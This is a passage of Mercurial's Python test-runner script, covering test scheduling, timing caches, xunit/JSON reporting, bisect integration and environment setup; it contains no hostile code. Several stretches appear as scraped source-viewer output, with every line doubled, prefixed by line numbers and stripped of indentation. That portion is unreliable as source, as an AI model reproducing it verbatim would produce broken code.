                    for kw in self._keywords.lower().split():
                        if kw not in haystack:
                            result.addIgnore(test, "doesn't match keyword")
                            kw_missing = True
                            break

                    if kw_missing:
                        continue
            for _ in xrange(self._runs_per_test):
                tests.append(get())

        runtests = list(tests)
        done = queue.Queue()
        running = 0

        channels = [""] * self._jobs

        def job(test, result):
            # claim the first free output channel for --showchannels
            for idx, label in enumerate(channels):
                if not label:
                    channel = idx
                    break
            else:
                raise ValueError('Could not find output channel')
            channels[channel] = "=" + test.name[5:].split(".")[0]
            try:
                test(result)
                done.put(None)
            except KeyboardInterrupt:
                pass
            except:  # re-raises
                done.put(('!', test, 'run-test raised an error, see traceback'))
                raise
            finally:
                try:
                    channels[channel] = ''
                except IndexError:
                    pass

        def stat():
            # --showchannels ticker: scroll one character of each channel's
            # label per tick until the main loop clears ``channels``
            count = 0
            while channels:
                row = '\n%03s ' % count
                for idx, label in enumerate(channels):
                    if label:
                        row += label[0]
                        channels[idx] = label[1:] or '.'
                    else:
                        row += ' '
                    row += ' '
                with iolock:
                    sys.stdout.write(row + ' ')
                    sys.stdout.flush()
                for _tick in xrange(10):
                    if channels:
                        time.sleep(0.1)
                count += 1

        stoppedearly = False

        if self._showchannels:
            statthread = threading.Thread(target=stat, name="stat")
            statthread.start()

        try:
            while tests or running:
                if not done.empty() or running == self._jobs or not tests:
                    try:
                        done.get(True, 1)
                        running -= 1
                        if result and result.shouldStop:
                            stoppedearly = True
                            break
                    except queue.Empty:
                        continue
                if tests and not running == self._jobs:
                    test = tests.pop(0)
                    if self._loop:
                        if getattr(test, 'should_reload', False):
                            num_tests[0] += 1
                            tests.append(self._loadtest(test, num_tests[0]))
                        else:
                            tests.append(test)
                    if self._jobs == 1:
                        job(test, result)
                    else:
                        worker = threading.Thread(
                            target=job, name=test.name, args=(test, result)
                        )
                        worker.start()
                    running += 1

            # If we stop early we still need to wait on started tests to
            # finish. Otherwise, there is a race between the test completing
            # and the test's cleanup code running. This could result in the
            # test reporting incorrect.
            if stoppedearly:
                while running:
                    try:
                        done.get(True, 1)
                        running -= 1
                    except queue.Empty:
                        continue
        except KeyboardInterrupt:
            for test in runtests:
                test.abort()

        # rebinding (not mutating) makes the stat thread's loop terminate
        channels = []

        return result
2528
2528
2529
2529
2530 # Save the most recent 5 wall-clock runtimes of each test to a
2530 # Save the most recent 5 wall-clock runtimes of each test to a
2531 # human-readable text file named .testtimes. Tests are sorted
2531 # human-readable text file named .testtimes. Tests are sorted
2532 # alphabetically, while times for each test are listed from oldest to
2532 # alphabetically, while times for each test are listed from oldest to
2533 # newest.
2533 # newest.
2534
2534
2535
2535
def loadtimes(outputdir):
    """Load per-test timing data from ``.testtimes`` in ``outputdir``.

    Returns a list of ``(testname, [runtime, ...])`` pairs, where runtimes
    are floats listed oldest-first.  A missing file yields an empty list;
    any other I/O error is re-raised.  Malformed lines in a corrupt cache
    file are skipped rather than crashing the whole run.
    """
    times = []
    try:
        with open(os.path.join(outputdir, b'.testtimes')) as fp:
            for line in fp:
                m = re.match('(.*?) ([0-9. ]+)', line)
                if not m:
                    # previously an unmatched line raised AttributeError
                    # via ``None.group``; ignore garbage instead
                    continue
                times.append(
                    (m.group(1), [float(t) for t in m.group(2).split()])
                )
    except IOError as err:
        if err.errno != errno.ENOENT:
            raise
    return times
2549
2549
2550
2550
def savetimes(outputdir, result):
    """Merge this run's wall-clock times into ``.testtimes``.

    Keeps at most the five most recent runtimes per test (oldest first),
    skipping tests that were skipped this run.  The file is written to a
    temporary name first and then renamed over the old one; failures to
    unlink/rename are deliberately ignored (best effort).
    """
    maxruns = 5
    saved = dict(loadtimes(outputdir))
    skipped = {str(entry[0]) for entry in result.skipped}
    for tdata in result.times:
        testname, real = tdata[0], tdata[3]
        if testname in skipped:
            continue
        runs = saved.setdefault(testname, [])
        runs.append(real)
        # retain only the most recent maxruns entries
        runs[:] = runs[-maxruns:]

    fd, tmpname = tempfile.mkstemp(
        prefix=b'.testtimes', dir=outputdir, text=True
    )
    with os.fdopen(fd, 'w') as fp:
        for name, runs in sorted(saved.items()):
            fp.write('%s %s\n' % (name, ' '.join(['%.3f' % (t,) for t in runs])))
    timepath = os.path.join(outputdir, b'.testtimes')
    try:
        os.unlink(timepath)
    except OSError:
        pass
    try:
        os.rename(tmpname, timepath)
    except OSError:
        pass
2577
2577
2578
2578
class TextTestRunner(unittest.TextTestRunner):
    """Custom unittest test runner that uses appropriate settings.

    Wraps the harness's own result class (``getTestResult()``) and adds
    xunit/JSON report writing, skip/failure summaries, timing reports and
    optional ``hg bisect`` integration for failing tests.
    """

    def __init__(self, runner, *args, **kwargs):
        super(TextTestRunner, self).__init__(*args, **kwargs)

        # The owning TestRunner; provides .options and output locations.
        self._runner = runner

        self._result = getTestResult()(
            self._runner.options, self.stream, self.descriptions, self.verbosity
        )

    def listtests(self, test):
        """Print the sorted test names without running them.

        Every listed test is recorded as a success so that the optional
        xunit/JSON reports still have well-formed content.
        """
        test = sorted(test, key=lambda t: t.name)

        self._result.onStart(test)

        for t in test:
            print(t.name)
            self._result.addSuccess(t)

        if self._runner.options.xunit:
            with open(self._runner.options.xunit, "wb") as xuf:
                self._writexunit(self._result, xuf)

        if self._runner.options.json:
            jsonpath = os.path.join(self._runner._outputdir, b'report.json')
            with open(jsonpath, 'w') as fp:
                self._writejson(self._result, fp)

        return self._result

    def run(self, test):
        """Run *test* (normally a suite) and emit all configured reports."""
        self._result.onStart(test)
        test(self._result)

        failed = len(self._result.failures)
        skipped = len(self._result.skipped)
        ignored = len(self._result.ignored)

        # iolock serializes output with the worker threads' own writes.
        with iolock:
            self.stream.writeln('')

            if not self._runner.options.noskips:
                for test, msg in sorted(
                    self._result.skipped, key=lambda s: s[0].name
                ):
                    formatted = 'Skipped %s: %s\n' % (test.name, msg)
                    msg = highlightmsg(formatted, self._result.color)
                    self.stream.write(msg)
            for test, msg in sorted(
                self._result.failures, key=lambda f: f[0].name
            ):
                formatted = 'Failed %s: %s\n' % (test.name, msg)
                self.stream.write(highlightmsg(formatted, self._result.color))
            for test, msg in sorted(
                self._result.errors, key=lambda e: e[0].name
            ):
                self.stream.writeln('Errored %s: %s' % (test.name, msg))

            if self._runner.options.xunit:
                with open(self._runner.options.xunit, "wb") as xuf:
                    self._writexunit(self._result, xuf)

            if self._runner.options.json:
                jsonpath = os.path.join(self._runner._outputdir, b'report.json')
                with open(jsonpath, 'w') as fp:
                    self._writejson(self._result, fp)

            self._runner._checkhglib('Tested')

            savetimes(self._runner._outputdir, self._result)

            if failed and self._runner.options.known_good_rev:
                self._bisecttests(t for t, m in self._result.failures)
            self.stream.writeln(
                '# Ran %d tests, %d skipped, %d failed.'
                % (self._result.testsRun, skipped + ignored, failed)
            )
            if failed:
                self.stream.writeln(
                    'python hash seed: %s' % os.environ['PYTHONHASHSEED']
                )
            if self._runner.options.time:
                self.printtimes(self._result.times)

            if self._runner.options.exceptions:
                exceptions = aggregateexceptions(
                    os.path.join(self._runner._outputdir, b'exceptions')
                )

                self.stream.writeln('Exceptions Report:')
                self.stream.writeln(
                    '%d total from %d frames'
                    % (exceptions['total'], len(exceptions['exceptioncounts']))
                )
                combined = exceptions['combined']
                for key in sorted(combined, key=combined.get, reverse=True):
                    frame, line, exc = key
                    totalcount, testcount, leastcount, leasttest = combined[key]

                    self.stream.writeln(
                        '%d (%d tests)\t%s: %s (%s - %d total)'
                        % (
                            totalcount,
                            testcount,
                            frame,
                            exc,
                            leasttest,
                            leastcount,
                        )
                    )

            self.stream.flush()

        return self._result

    def _bisecttests(self, tests):
        """Run ``hg bisect`` per failing test to find the breaking revision."""
        bisectcmd = ['hg', 'bisect']
        bisectrepo = self._runner.options.bisect_repo
        if bisectrepo:
            bisectcmd.extend(['-R', os.path.abspath(bisectrepo)])

        def pread(args):
            # Run a command with HGPLAIN set so output is parseable.
            env = os.environ.copy()
            env['HGPLAIN'] = '1'
            p = subprocess.Popen(
                args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env
            )
            data = p.stdout.read()
            p.wait()
            return data

        for test in tests:
            # (Fixed: the original had a stray trailing comma after this call,
            # building and discarding a one-element tuple.)
            pread(bisectcmd + ['--reset'])
            pread(bisectcmd + ['--bad', '.'])
            pread(bisectcmd + ['--good', self._runner.options.known_good_rev])
            # TODO: we probably need to forward more options
            # that alter hg's behavior inside the tests.
            opts = ''
            withhg = self._runner.options.with_hg
            if withhg:
                opts += ' --with-hg=%s ' % shellquote(_bytes2sys(withhg))
            rtc = '%s %s %s %s' % (sysexecutable, sys.argv[0], opts, test)
            data = pread(bisectcmd + ['--command', rtc])
            m = re.search(
                (
                    br'\nThe first (?P<goodbad>bad|good) revision '
                    br'is:\nchangeset: +\d+:(?P<node>[a-f0-9]+)\n.*\n'
                    br'summary: +(?P<summary>[^\n]+)\n'
                ),
                data,
                (re.MULTILINE | re.DOTALL),
            )
            if m is None:
                self.stream.writeln(
                    'Failed to identify failure point for %s' % test
                )
                continue
            dat = m.groupdict()
            verb = 'broken' if dat['goodbad'] == b'bad' else 'fixed'
            self.stream.writeln(
                '%s %s by %s (%s)'
                % (
                    test,
                    verb,
                    dat['node'].decode('ascii'),
                    dat['summary'].decode('utf8', 'ignore'),
                )
            )

    def printtimes(self, times):
        """Write a per-test timing table, slowest (by real time) last."""
        # iolock held by run
        self.stream.writeln('# Producing time report')
        times.sort(key=lambda t: (t[3]))
        cols = '%7.3f %7.3f %7.3f %7.3f %7.3f %s'
        self.stream.writeln(
            '%-7s %-7s %-7s %-7s %-7s %s'
            % ('start', 'end', 'cuser', 'csys', 'real', 'Test')
        )
        for tdata in times:
            test = tdata[0]
            cuser, csys, real, start, end = tdata[1:6]
            self.stream.writeln(cols % (start, end, cuser, csys, real, test))

    @staticmethod
    def _writexunit(result, outf):
        """Write *result* as JUnit-style XML to the binary file *outf*."""
        # See http://llg.cubic.org/docs/junit/ for a reference.
        timesd = {t[0]: t[3] for t in result.times}
        doc = minidom.Document()
        s = doc.createElement('testsuite')
        s.setAttribute('errors', "0")  # TODO
        s.setAttribute('failures', str(len(result.failures)))
        s.setAttribute('name', 'run-tests')
        s.setAttribute(
            'skipped', str(len(result.skipped) + len(result.ignored))
        )
        s.setAttribute('tests', str(result.testsRun))
        doc.appendChild(s)
        for tc in result.successes:
            t = doc.createElement('testcase')
            t.setAttribute('name', tc.name)
            tctime = timesd.get(tc.name)
            if tctime is not None:
                t.setAttribute('time', '%.3f' % tctime)
            s.appendChild(t)
        for tc, err in sorted(result.faildata.items()):
            t = doc.createElement('testcase')
            t.setAttribute('name', tc)
            tctime = timesd.get(tc)
            if tctime is not None:
                t.setAttribute('time', '%.3f' % tctime)
            # createCDATASection expects a unicode or it will
            # convert using default conversion rules, which will
            # fail if string isn't ASCII.
            err = cdatasafe(err).decode('utf-8', 'replace')
            cd = doc.createCDATASection(err)
            # Use 'failure' here instead of 'error' to match errors = 0,
            # failures = len(result.failures) in the testsuite element.
            failelem = doc.createElement('failure')
            failelem.setAttribute('message', 'output changed')
            failelem.setAttribute('type', 'output-mismatch')
            failelem.appendChild(cd)
            t.appendChild(failelem)
            s.appendChild(t)
        for tc, message in result.skipped:
            # According to the schema, 'skipped' has no attributes. So store
            # the skip message as a text node instead.
            t = doc.createElement('testcase')
            t.setAttribute('name', tc.name)
            binmessage = message.encode('utf-8')
            message = cdatasafe(binmessage).decode('utf-8', 'replace')
            cd = doc.createCDATASection(message)
            skipelem = doc.createElement('skipped')
            skipelem.appendChild(cd)
            t.appendChild(skipelem)
            s.appendChild(t)
        outf.write(doc.toprettyxml(indent='  ', encoding='utf-8'))

    @staticmethod
    def _writejson(result, outf):
        """Write *result* as a ``testreport =``-prefixed JSON blob to *outf*."""
        timesd = {}
        for tdata in result.times:
            test = tdata[0]
            timesd[test] = tdata[1:]

        outcome = {}
        groups = [
            ('success', ((tc, None) for tc in result.successes)),
            ('failure', result.failures),
            ('skip', result.skipped),
        ]
        for res, testcases in groups:
            for tc, __ in testcases:
                if tc.name in timesd:
                    diff = result.faildata.get(tc.name, b'')
                    try:
                        diff = diff.decode('unicode_escape')
                    except UnicodeDecodeError as e:
                        diff = '%r decoding diff, sorry' % e
                    tres = {
                        'result': res,
                        'time': ('%0.3f' % timesd[tc.name][2]),
                        'cuser': ('%0.3f' % timesd[tc.name][0]),
                        'csys': ('%0.3f' % timesd[tc.name][1]),
                        'start': ('%0.3f' % timesd[tc.name][3]),
                        'end': ('%0.3f' % timesd[tc.name][4]),
                        'diff': diff,
                    }
                else:
                    # blacklisted test
                    tres = {'result': res}

                outcome[tc.name] = tres
        jsonout = json.dumps(
            outcome, sort_keys=True, indent=4, separators=(',', ': ')
        )
        outf.writelines(("testreport =", jsonout))
2857
2857
2858
2858
def sorttests(testdescs, previoustimes, shuffle=False):
    """Do an in-place sort of tests.

    With ``shuffle`` the order is randomized instead. When recorded
    ``previoustimes`` are available, the slowest-most-recently tests run
    first; otherwise file size (scaled by slow-test keywords) is used as a
    rough estimate of runtime.
    """
    if shuffle:
        random.shuffle(testdescs)
        return

    if previoustimes:

        def sortkey(f):
            f = f['path']
            if f in previoustimes:
                # Use most recent time as estimate
                return -(previoustimes[f][-1])
            else:
                # Default to a rather arbitrary value of 1 second for new tests
                return -1.0

    else:
        # keywords for slow tests
        slow = {
            b'svn': 10,
            b'cvs': 10,
            b'hghave': 10,
            b'largefiles-update': 10,
            b'run-tests': 10,
            b'corruption': 10,
            b'race': 10,
            b'i18n': 10,
            b'check': 100,
            b'gendoc': 100,
            b'contrib-perf': 200,
            b'merge-combination': 100,
        }
        perf = {}  # memoized sort keys, keyed by test path

        def sortkey(f):
            # run largest tests first, as they tend to take the longest
            f = f['path']
            try:
                return perf[f]
            except KeyError:
                try:
                    val = -os.stat(f).st_size
                except OSError as e:
                    if e.errno != errno.ENOENT:
                        raise
                    perf[f] = -1e9  # file does not exist, tell early
                    return -1e9
                for kw, mul in slow.items():
                    if kw in f:
                        val *= mul
                if f.endswith(b'.py'):
                    val /= 10.0
                perf[f] = val / 1000.0
                return perf[f]

    testdescs.sort(key=sortkey)
2916
2916
2917
2917
2918 class TestRunner(object):
2918 class TestRunner(object):
2919 """Holds context for executing tests.
2919 """Holds context for executing tests.
2920
2920
2921 Tests rely on a lot of state. This object holds it for them.
2921 Tests rely on a lot of state. This object holds it for them.
2922 """
2922 """
2923
2923
2924 # Programs required to run tests.
2924 # Programs required to run tests.
2925 REQUIREDTOOLS = [
2925 REQUIREDTOOLS = [
2926 b'diff',
2926 b'diff',
2927 b'grep',
2927 b'grep',
2928 b'unzip',
2928 b'unzip',
2929 b'gunzip',
2929 b'gunzip',
2930 b'bunzip2',
2930 b'bunzip2',
2931 b'sed',
2931 b'sed',
2932 ]
2932 ]
2933
2933
2934 # Maps file extensions to test class.
2934 # Maps file extensions to test class.
2935 TESTTYPES = [
2935 TESTTYPES = [
2936 (b'.py', PythonTest),
2936 (b'.py', PythonTest),
2937 (b'.t', TTest),
2937 (b'.t', TTest),
2938 ]
2938 ]
2939
2939
2940 def __init__(self):
2940 def __init__(self):
2941 self.options = None
2941 self.options = None
2942 self._hgroot = None
2942 self._hgroot = None
2943 self._testdir = None
2943 self._testdir = None
2944 self._outputdir = None
2944 self._outputdir = None
2945 self._hgtmp = None
2945 self._hgtmp = None
2946 self._installdir = None
2946 self._installdir = None
2947 self._bindir = None
2947 self._bindir = None
2948 self._tmpbinddir = None
2948 self._tmpbinddir = None
2949 self._pythondir = None
2949 self._pythondir = None
2950 self._coveragefile = None
2950 self._coveragefile = None
2951 self._createdfiles = []
2951 self._createdfiles = []
2952 self._hgcommand = None
2952 self._hgcommand = None
2953 self._hgpath = None
2953 self._hgpath = None
2954 self._portoffset = 0
2954 self._portoffset = 0
2955 self._ports = {}
2955 self._ports = {}
2956
2956
2957 def run(self, args, parser=None):
2957 def run(self, args, parser=None):
2958 """Run the test suite."""
2958 """Run the test suite."""
2959 oldmask = os.umask(0o22)
2959 oldmask = os.umask(0o22)
2960 try:
2960 try:
2961 parser = parser or getparser()
2961 parser = parser or getparser()
2962 options = parseargs(args, parser)
2962 options = parseargs(args, parser)
2963 tests = [_sys2bytes(a) for a in options.tests]
2963 tests = [_sys2bytes(a) for a in options.tests]
2964 if options.test_list is not None:
2964 if options.test_list is not None:
2965 for listfile in options.test_list:
2965 for listfile in options.test_list:
2966 with open(listfile, 'rb') as f:
2966 with open(listfile, 'rb') as f:
2967 tests.extend(t for t in f.read().splitlines() if t)
2967 tests.extend(t for t in f.read().splitlines() if t)
2968 self.options = options
2968 self.options = options
2969
2969
2970 self._checktools()
2970 self._checktools()
2971 testdescs = self.findtests(tests)
2971 testdescs = self.findtests(tests)
2972 if options.profile_runner:
2972 if options.profile_runner:
2973 import statprof
2973 import statprof
2974
2974
2975 statprof.start()
2975 statprof.start()
2976 result = self._run(testdescs)
2976 result = self._run(testdescs)
2977 if options.profile_runner:
2977 if options.profile_runner:
2978 statprof.stop()
2978 statprof.stop()
2979 statprof.display()
2979 statprof.display()
2980 return result
2980 return result
2981
2981
2982 finally:
2982 finally:
2983 os.umask(oldmask)
2983 os.umask(oldmask)
2984
2984
2985 def _run(self, testdescs):
2985 def _run(self, testdescs):
2986 testdir = getcwdb()
2986 testdir = getcwdb()
2987 self._testdir = osenvironb[b'TESTDIR'] = getcwdb()
2987 self._testdir = osenvironb[b'TESTDIR'] = getcwdb()
2988 # assume all tests in same folder for now
2988 # assume all tests in same folder for now
2989 if testdescs:
2989 if testdescs:
2990 pathname = os.path.dirname(testdescs[0]['path'])
2990 pathname = os.path.dirname(testdescs[0]['path'])
2991 if pathname:
2991 if pathname:
2992 testdir = os.path.join(testdir, pathname)
2992 testdir = os.path.join(testdir, pathname)
2993 self._testdir = osenvironb[b'TESTDIR'] = testdir
2993 self._testdir = osenvironb[b'TESTDIR'] = testdir
2994 if self.options.outputdir:
2994 if self.options.outputdir:
2995 self._outputdir = canonpath(_sys2bytes(self.options.outputdir))
2995 self._outputdir = canonpath(_sys2bytes(self.options.outputdir))
2996 else:
2996 else:
2997 self._outputdir = getcwdb()
2997 self._outputdir = getcwdb()
2998 if testdescs and pathname:
2998 if testdescs and pathname:
2999 self._outputdir = os.path.join(self._outputdir, pathname)
2999 self._outputdir = os.path.join(self._outputdir, pathname)
3000 previoustimes = {}
3000 previoustimes = {}
3001 if self.options.order_by_runtime:
3001 if self.options.order_by_runtime:
3002 previoustimes = dict(loadtimes(self._outputdir))
3002 previoustimes = dict(loadtimes(self._outputdir))
3003 sorttests(testdescs, previoustimes, shuffle=self.options.random)
3003 sorttests(testdescs, previoustimes, shuffle=self.options.random)
3004
3004
3005 if 'PYTHONHASHSEED' not in os.environ:
3005 if 'PYTHONHASHSEED' not in os.environ:
3006 # use a random python hash seed all the time
3006 # use a random python hash seed all the time
3007 # we do the randomness ourself to know what seed is used
3007 # we do the randomness ourself to know what seed is used
3008 os.environ['PYTHONHASHSEED'] = str(random.getrandbits(32))
3008 os.environ['PYTHONHASHSEED'] = str(random.getrandbits(32))
3009
3009
3010 # Rayon (Rust crate for multi-threading) will use all logical CPU cores
3010 # Rayon (Rust crate for multi-threading) will use all logical CPU cores
3011 # by default, causing thrashing on high-cpu-count systems.
3011 # by default, causing thrashing on high-cpu-count systems.
3012 # Setting its limit to 3 during tests should still let us uncover
3012 # Setting its limit to 3 during tests should still let us uncover
3013 # multi-threading bugs while keeping the thrashing reasonable.
3013 # multi-threading bugs while keeping the thrashing reasonable.
3014 os.environ.setdefault("RAYON_NUM_THREADS", "3")
3014 os.environ.setdefault("RAYON_NUM_THREADS", "3")
3015
3015
3016 if self.options.tmpdir:
3016 if self.options.tmpdir:
3017 self.options.keep_tmpdir = True
3017 self.options.keep_tmpdir = True
3018 tmpdir = _sys2bytes(self.options.tmpdir)
3018 tmpdir = _sys2bytes(self.options.tmpdir)
3019 if os.path.exists(tmpdir):
3019 if os.path.exists(tmpdir):
3020 # Meaning of tmpdir has changed since 1.3: we used to create
3020 # Meaning of tmpdir has changed since 1.3: we used to create
3021 # HGTMP inside tmpdir; now HGTMP is tmpdir. So fail if
3021 # HGTMP inside tmpdir; now HGTMP is tmpdir. So fail if
3022 # tmpdir already exists.
3022 # tmpdir already exists.
3023 print("error: temp dir %r already exists" % tmpdir)
3023 print("error: temp dir %r already exists" % tmpdir)
3024 return 1
3024 return 1
3025
3025
3026 os.makedirs(tmpdir)
3026 os.makedirs(tmpdir)
3027 else:
3027 else:
3028 d = None
3028 d = None
3029 if os.name == 'nt':
3029 if os.name == 'nt':
3030 # without this, we get the default temp dir location, but
3030 # without this, we get the default temp dir location, but
3031 # in all lowercase, which causes troubles with paths (issue3490)
3031 # in all lowercase, which causes troubles with paths (issue3490)
3032 d = osenvironb.get(b'TMP', None)
3032 d = osenvironb.get(b'TMP', None)
3033 tmpdir = tempfile.mkdtemp(b'', b'hgtests.', d)
3033 tmpdir = tempfile.mkdtemp(b'', b'hgtests.', d)
3034
3034
3035 self._hgtmp = osenvironb[b'HGTMP'] = os.path.realpath(tmpdir)
3035 self._hgtmp = osenvironb[b'HGTMP'] = os.path.realpath(tmpdir)
3036
3036
3037 if self.options.with_hg:
3037 if self.options.with_hg:
3038 self._installdir = None
3038 self._installdir = None
3039 whg = self.options.with_hg
3039 whg = self.options.with_hg
3040 self._bindir = os.path.dirname(os.path.realpath(whg))
3040 self._bindir = os.path.dirname(os.path.realpath(whg))
3041 assert isinstance(self._bindir, bytes)
3041 assert isinstance(self._bindir, bytes)
3042 self._hgcommand = os.path.basename(whg)
3042 self._hgcommand = os.path.basename(whg)
3043 self._tmpbindir = os.path.join(self._hgtmp, b'install', b'bin')
3043 self._tmpbindir = os.path.join(self._hgtmp, b'install', b'bin')
3044 os.makedirs(self._tmpbindir)
3044 os.makedirs(self._tmpbindir)
3045
3045
3046 normbin = os.path.normpath(os.path.abspath(whg))
3046 normbin = os.path.normpath(os.path.abspath(whg))
3047 normbin = normbin.replace(_sys2bytes(os.sep), b'/')
3047 normbin = normbin.replace(_sys2bytes(os.sep), b'/')
3048
3048
3049 # Other Python scripts in the test harness need to
3049 # Other Python scripts in the test harness need to
3050 # `import mercurial`. If `hg` is a Python script, we assume
3050 # `import mercurial`. If `hg` is a Python script, we assume
3051 # the Mercurial modules are relative to its path and tell the tests
3051 # the Mercurial modules are relative to its path and tell the tests
3052 # to load Python modules from its directory.
3052 # to load Python modules from its directory.
3053 with open(whg, 'rb') as fh:
3053 with open(whg, 'rb') as fh:
3054 initial = fh.read(1024)
3054 initial = fh.read(1024)
3055
3055
3056 if re.match(b'#!.*python', initial):
3056 if re.match(b'#!.*python', initial):
3057 self._pythondir = self._bindir
3057 self._pythondir = self._bindir
3058 # If it looks like our in-repo Rust binary, use the source root.
3058 # If it looks like our in-repo Rust binary, use the source root.
3059 # This is a bit hacky. But rhg is still not supported outside the
3059 # This is a bit hacky. But rhg is still not supported outside the
3060 # source directory. So until it is, do the simple thing.
3060 # source directory. So until it is, do the simple thing.
3061 elif re.search(b'/rust/target/[^/]+/hg', normbin):
3061 elif re.search(b'/rust/target/[^/]+/hg', normbin):
3062 self._pythondir = os.path.dirname(self._testdir)
3062 self._pythondir = os.path.dirname(self._testdir)
3063 # Fall back to the legacy behavior.
3063 # Fall back to the legacy behavior.
3064 else:
3064 else:
3065 self._pythondir = self._bindir
3065 self._pythondir = self._bindir
3066
3066
3067 else:
3067 else:
3068 self._installdir = os.path.join(self._hgtmp, b"install")
3068 self._installdir = os.path.join(self._hgtmp, b"install")
3069 self._bindir = os.path.join(self._installdir, b"bin")
3069 self._bindir = os.path.join(self._installdir, b"bin")
3070 self._hgcommand = b'hg'
3070 self._hgcommand = b'hg'
3071 self._tmpbindir = self._bindir
3071 self._tmpbindir = self._bindir
3072 self._pythondir = os.path.join(self._installdir, b"lib", b"python")
3072 self._pythondir = os.path.join(self._installdir, b"lib", b"python")
3073
3073
3074 # Force the use of hg.exe instead of relying on MSYS to recognize hg is
3074 # Force the use of hg.exe instead of relying on MSYS to recognize hg is
3075 # a python script and feed it to python.exe. Legacy stdio is force
3075 # a python script and feed it to python.exe. Legacy stdio is force
3076 # enabled by hg.exe, and this is a more realistic way to launch hg
3076 # enabled by hg.exe, and this is a more realistic way to launch hg
3077 # anyway.
3077 # anyway.
3078 if os.name == 'nt' and not self._hgcommand.endswith(b'.exe'):
3078 if os.name == 'nt' and not self._hgcommand.endswith(b'.exe'):
3079 self._hgcommand += b'.exe'
3079 self._hgcommand += b'.exe'
3080
3080
3081 # set CHGHG, then replace "hg" command by "chg"
3081 # set CHGHG, then replace "hg" command by "chg"
3082 chgbindir = self._bindir
3082 chgbindir = self._bindir
3083 if self.options.chg or self.options.with_chg:
3083 if self.options.chg or self.options.with_chg:
3084 osenvironb[b'CHGHG'] = os.path.join(self._bindir, self._hgcommand)
3084 osenvironb[b'CHGHG'] = os.path.join(self._bindir, self._hgcommand)
3085 else:
3085 else:
3086 osenvironb.pop(b'CHGHG', None) # drop flag for hghave
3086 osenvironb.pop(b'CHGHG', None) # drop flag for hghave
3087 if self.options.chg:
3087 if self.options.chg:
3088 self._hgcommand = b'chg'
3088 self._hgcommand = b'chg'
3089 elif self.options.with_chg:
3089 elif self.options.with_chg:
3090 chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
3090 chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
3091 self._hgcommand = os.path.basename(self.options.with_chg)
3091 self._hgcommand = os.path.basename(self.options.with_chg)
3092
3092
3093 osenvironb[b"BINDIR"] = self._bindir
3093 osenvironb[b"BINDIR"] = self._bindir
3094 osenvironb[b"PYTHON"] = PYTHON
3094 osenvironb[b"PYTHON"] = PYTHON
3095
3095
3096 fileb = _sys2bytes(__file__)
3096 fileb = _sys2bytes(__file__)
3097 runtestdir = os.path.abspath(os.path.dirname(fileb))
3097 runtestdir = os.path.abspath(os.path.dirname(fileb))
3098 osenvironb[b'RUNTESTDIR'] = runtestdir
3098 osenvironb[b'RUNTESTDIR'] = runtestdir
3099 if PYTHON3:
3099 if PYTHON3:
3100 sepb = _sys2bytes(os.pathsep)
3100 sepb = _sys2bytes(os.pathsep)
3101 else:
3101 else:
3102 sepb = os.pathsep
3102 sepb = os.pathsep
3103 path = [self._bindir, runtestdir] + osenvironb[b"PATH"].split(sepb)
3103 path = [self._bindir, runtestdir] + osenvironb[b"PATH"].split(sepb)
3104 if os.path.islink(__file__):
3104 if os.path.islink(__file__):
3105 # test helper will likely be at the end of the symlink
3105 # test helper will likely be at the end of the symlink
3106 realfile = os.path.realpath(fileb)
3106 realfile = os.path.realpath(fileb)
3107 realdir = os.path.abspath(os.path.dirname(realfile))
3107 realdir = os.path.abspath(os.path.dirname(realfile))
3108 path.insert(2, realdir)
3108 path.insert(2, realdir)
3109 if chgbindir != self._bindir:
3109 if chgbindir != self._bindir:
3110 path.insert(1, chgbindir)
3110 path.insert(1, chgbindir)
3111 if self._testdir != runtestdir:
3111 if self._testdir != runtestdir:
3112 path = [self._testdir] + path
3112 path = [self._testdir] + path
3113 if self._tmpbindir != self._bindir:
3113 if self._tmpbindir != self._bindir:
3114 path = [self._tmpbindir] + path
3114 path = [self._tmpbindir] + path
3115 osenvironb[b"PATH"] = sepb.join(path)
3115 osenvironb[b"PATH"] = sepb.join(path)
3116
3116
3117 # Include TESTDIR in PYTHONPATH so that out-of-tree extensions
3117 # Include TESTDIR in PYTHONPATH so that out-of-tree extensions
3118 # can run .../tests/run-tests.py test-foo where test-foo
3118 # can run .../tests/run-tests.py test-foo where test-foo
3119 # adds an extension to HGRC. Also include run-test.py directory to
3119 # adds an extension to HGRC. Also include run-test.py directory to
3120 # import modules like heredoctest.
3120 # import modules like heredoctest.
3121 pypath = [self._pythondir, self._testdir, runtestdir]
3121 pypath = [self._pythondir, self._testdir, runtestdir]
3122 # We have to augment PYTHONPATH, rather than simply replacing
3122 # We have to augment PYTHONPATH, rather than simply replacing
3123 # it, in case external libraries are only available via current
3123 # it, in case external libraries are only available via current
3124 # PYTHONPATH. (In particular, the Subversion bindings on OS X
3124 # PYTHONPATH. (In particular, the Subversion bindings on OS X
3125 # are in /opt/subversion.)
3125 # are in /opt/subversion.)
3126 oldpypath = osenvironb.get(IMPL_PATH)
3126 oldpypath = osenvironb.get(IMPL_PATH)
3127 if oldpypath:
3127 if oldpypath:
3128 pypath.append(oldpypath)
3128 pypath.append(oldpypath)
3129 osenvironb[IMPL_PATH] = sepb.join(pypath)
3129 osenvironb[IMPL_PATH] = sepb.join(pypath)
3130
3130
3131 if self.options.pure:
3131 if self.options.pure:
3132 os.environ["HGTEST_RUN_TESTS_PURE"] = "--pure"
3132 os.environ["HGTEST_RUN_TESTS_PURE"] = "--pure"
3133 os.environ["HGMODULEPOLICY"] = "py"
3133 os.environ["HGMODULEPOLICY"] = "py"
3134 if self.options.rust:
3134 if self.options.rust:
3135 os.environ["HGMODULEPOLICY"] = "rust+c"
3135 os.environ["HGMODULEPOLICY"] = "rust+c"
3136 if self.options.no_rust:
3136 if self.options.no_rust:
3137 current_policy = os.environ.get("HGMODULEPOLICY", "")
3137 current_policy = os.environ.get("HGMODULEPOLICY", "")
3138 if current_policy.startswith("rust+"):
3138 if current_policy.startswith("rust+"):
3139 os.environ["HGMODULEPOLICY"] = current_policy[len("rust+") :]
3139 os.environ["HGMODULEPOLICY"] = current_policy[len("rust+") :]
3140 os.environ.pop("HGWITHRUSTEXT", None)
3140 os.environ.pop("HGWITHRUSTEXT", None)
3141
3141
3142 if self.options.allow_slow_tests:
3142 if self.options.allow_slow_tests:
3143 os.environ["HGTEST_SLOW"] = "slow"
3143 os.environ["HGTEST_SLOW"] = "slow"
3144 elif 'HGTEST_SLOW' in os.environ:
